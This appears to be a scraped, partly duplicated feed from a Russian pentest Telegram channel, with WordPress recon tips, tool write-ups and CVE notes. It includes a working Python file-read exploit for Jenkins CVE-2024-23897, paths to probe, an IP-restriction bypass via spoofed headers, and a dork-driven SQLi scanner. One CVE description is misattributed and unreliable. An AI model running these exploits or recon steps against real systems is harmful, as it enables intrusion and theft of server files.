Security
Please open Telegram to view this post
VIEW IN TELEGRAM
Профессиональные советы по безопасности WordPress
Перечисление плагинов и тем
Используйте эндпоинты
/wp-json/wp/v2/themes или /wp-json/wp/v2/plugins.
Плагины часто раскрывают активные компоненты и информацию о версиях.
Используйте кэширование
Проверяйте устаревшие кэшированные версии конфиденциальных файлов.
Ошибки в конфигурации сервера
Проверьте, включено ли отображение содержимого директорий для /wp-content/.
Инструменты отладки
Используйте заголовки x-forwarded-for, чтобы обойти ограничения по IP.
💻 Список критичных путей WordPress для проверки:
/wp-admin.php
/wp-config.php
/wp-content/uploads
/wp-load
/wp-signup.php
/wp-json
/wp-includes/
/wp-login.php
/wp-links-opml.php
/wp-activate.php
/wp-blog-header.php
/wp-cron.php
/wp-links.php
/wp-mail.php
/xmlrpc.php
/wp-settings.php
/wp-trackback.php
/wp-signup.php
/admin-bar.php
/wp-json/wp/v2/users
👉 Подписаться 👈
Перечисление плагинов и тем
Используйте эндпоинты
/wp-json/wp/v2/themes или /wp-json/wp/v2/plugins.
Плагины часто раскрывают активные компоненты и информацию о версиях.
Используйте кэширование
Проверяйте устаревшие кэшированные версии конфиденциальных файлов.
Ошибки в конфигурации сервера
Проверьте, включено ли отображение содержимого директорий для /wp-content/.
Инструменты отладки
Используйте заголовки x-forwarded-for, чтобы обойти ограничения по IP.
/wp-admin.php
/wp-config.php
/wp-content/uploads
/wp-load
/wp-signup.php
/wp-json
/wp-includes/
/wp-login.php
/wp-links-opml.php
/wp-activate.php
/wp-blog-header.php
/wp-cron.php
/wp-links.php
/wp-mail.php
/xmlrpc.php
/wp-settings.php
/wp-trackback.php
/wp-signup.php
/admin-bar.php
/wp-json/wp/v2/users
👉 Подписаться 👈
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2023-27372 — уязвимость типа Privilege Escalation (повышение привилегий), обнаруженная в Ivanti Avalanche, системе управления корпоративными мобильными устройствами (MDM).
🪙 💳 💳 Поддержать автора канала можно тут
👉 Подписаться 👈
#CVE #PHP
👉 Подписаться 👈
#CVE #PHP
Please open Telegram to view this post
VIEW IN TELEGRAM
StegCloak - это чистый модуль стеганографии JavaScript, разработанный в стиле функционального программирования, для скрытия текста на виду.
Он использует такие методы, как сжатие, шифрование и специальные невидимые символы Unicode для скрытия текста, что позволяет использовать стеганографию.
➖ Его цель - безопасно скрывать текстовое содержимое и добавлять водяные знаки.
🪙 💳 💳 Поддержать автора канала можно тут либо купить книгу 📔
👉 Подписаться 👈
#Tool #stegcloa
Он использует такие методы, как сжатие, шифрование и специальные невидимые символы Unicode для скрытия текста, что позволяет использовать стеганографию.
👉 Подписаться 👈
#Tool #stegcloa
Please open Telegram to view this post
VIEW IN TELEGRAM
Подборка инструментов для создания анонимной среды
🟢 OnionShare: позволяет безопасно и анонимно отправлять файлы и обмениваться данными через Tor, создавая временные "луковые" адреса для загрузки и скачивания.
🟢 SecureDrop: это система для безопасного обмена информацией между источниками и журналистами, позволяющая подать анонимное сообщение.
🟢 CalyxOS: это операционная система для мобильных устройств, ориентированная на конфиденциальность и безопасность. Она позволяет использовать приватные приложения и обеспечивает анонимность.
🟢 Cryptocat: позволяет пользователям обмениваться зашифрованными сообщениями в реальном времени, обеспечивая безопасность переписки разговора.
🟢 Privacy Badger: расширение для браузеров, которое автоматически блокирует трекеры, уменьшая объем собираемой о вас информации.
🪙 💳 💳 Поддержать автора канала можно тут / купить книгу 📔
👉 Подписаться 👈
#tools
👉 Подписаться 👈
#tools
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
This media is not supported in your browser
VIEW IN TELEGRAM
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#cve #smb #exploit #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Hackvertor — еще один инструмент, который выведет работу с Burp Suit на новый уровень.
Он выполняет преобразование на основе тегов, которое поддерживает различные escape-коды и кодировки, включая объекты HTML5, шестнадцатеричное, восьмеричное, юникод, кодировку URL-адресов и т. д.
- Он использует XML-подобные теги для указания типа используемого кодирования/преобразования.
- Вы можете использовать несколько вложенных тегов для выполнения преобразований.
- Теги также могут иметь аргументы, позволяющие им вести себя как функции.
- Он имеет функцию автоматического декодирования, позволяющую угадать тип требуемого преобразования и автоматически декодировать его несколько раз.
- И многое другое.
Купить книгу по пентесту для начинающих можно тут📔
👉 Подписаться 👈
#Burp #Hackvertor
Он выполняет преобразование на основе тегов, которое поддерживает различные escape-коды и кодировки, включая объекты HTML5, шестнадцатеричное, восьмеричное, юникод, кодировку URL-адресов и т. д.
- Он использует XML-подобные теги для указания типа используемого кодирования/преобразования.
- Вы можете использовать несколько вложенных тегов для выполнения преобразований.
- Теги также могут иметь аргументы, позволяющие им вести себя как функции.
- Он имеет функцию автоматического декодирования, позволяющую угадать тип требуемого преобразования и автоматически декодировать его несколько раз.
- И многое другое.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Burp #Hackvertor
Please open Telegram to view this post
VIEW IN TELEGRAM
Jenkins RCE Arbitrary File Read CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
Использование:
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Купить книгу по пентесту для начинающих можно тут📔
👉 Подписаться 👈
#Jenkins #cve #poc
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j. Эта функция включена по умолчанию, и в Jenkins 2.441 и более ранних версиях, LTS 2.426.2 и более ранних версиях она не отключается.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Обновление:
Обновление до Jenkins 2.442, LTS 2.426.3
Исправление:
Если вы не можете обновиться до последней версии, то отключите доступ к CLI, это должно полностью исключить возможность эксплуатации.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Jenkins #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
Это умный Tor-краулер с открытым исходным кодом с весьма внушительным функционалом и "мозгами".
Функционал:
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#TorBot #Tor #Bot
Please open Telegram to view this post
VIEW IN TELEGRAM
SQL-injection - одна из популярных и высокоэффективных атак на веб-приложения
Этот инструмент используется для сканирования уязвимостей SQL-инъекции на основе Python, который также может находить уязвимые веб-сайты SQL через Google Dorks.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#SQLiv #SQL #Scan #Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#http
Please open Telegram to view this post
VIEW IN TELEGRAM
Miku Miku Beam — это мощный сервер стресс-тестирования, доступный на GitHub
Этот проект выделяется своим удобным фронтендом, который позволяет настраивать множество параметров и запускать сетевые тестовые нагрузки.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Server
Этот проект выделяется своим удобным фронтендом, который позволяет настраивать множество параметров и запускать сетевые тестовые нагрузки.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#Server
👩💻 Nagios XI — RCE
В Nagios XI 2024R1.01 обнаружена уязвимость в компоненте monitoringwizard.php, допускающая аутентифицированную инъекцию SQL (CVE-2024-24401), которая позволяет злоумышленникам создать учетную запись администратора и удаленно выполнить код.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#nagios #sql #exploit
В Nagios XI 2024R1.01 обнаружена уязвимость в компоненте monitoringwizard.php, допускающая аутентифицированную инъекцию SQL (CVE-2024-24401), которая позволяет злоумышленникам создать учетную запись администратора и удаленно выполнить код.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#nagios #sql #exploit
My-arsenal-of-aws-security-tools - это тщательно подобранный список инструментов с открытым исходным кодом для обеспечения безопасности, аудита, криминалистики и реагирования на инциденты AWS.
Купить книгу по пентесту для начинающих можно тут
👉 Подписаться 👈
#AWS #GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM